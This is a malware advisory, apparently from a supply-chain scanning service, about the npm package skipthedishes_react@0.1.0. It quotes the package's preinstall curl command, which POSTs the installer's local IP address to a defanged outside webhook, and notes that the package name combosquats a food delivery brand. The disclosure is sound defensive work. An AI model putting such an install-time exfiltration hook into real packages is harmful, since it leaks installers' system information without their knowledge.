LWA-2026-5169 confirmed malware
skipthedishes_react@0.1.0
Malicious code in skipthedishes_react (npm)
T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel
Analysis
The package skipthedishes_react@0.1.0 contains a preinstall script in package.json that, upon installation, runs `curl --data "ip=$(hostname -I)"` to POST the installer's local IP address to the remote endpoint hxxps://webhook-test[.]com/9e564ced26afdbbc9a94ade711456ddb. The package ships no code or functional content — only the malicious hook — and the package name combosquats the SkipTheDishes food delivery service.
- analyzed by
- Leitwacht
- first seen
- Jun 14, 2026, 01:02 AM
- analyzed
- Jun 14, 2026, 01:03 AM
Related advisories
- server-up-ndot@1.0.0
- rtms-manager@1.2.0
- rtms-manager-dev@1.3.0
- request-logger-canary@1.0.0
- redux-probe-unknown-action-rce@1.0.0
- houzidawang806@1.0.1
- @wacrot/infra-data-kit@2.1.4
- prisma-callback@1.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.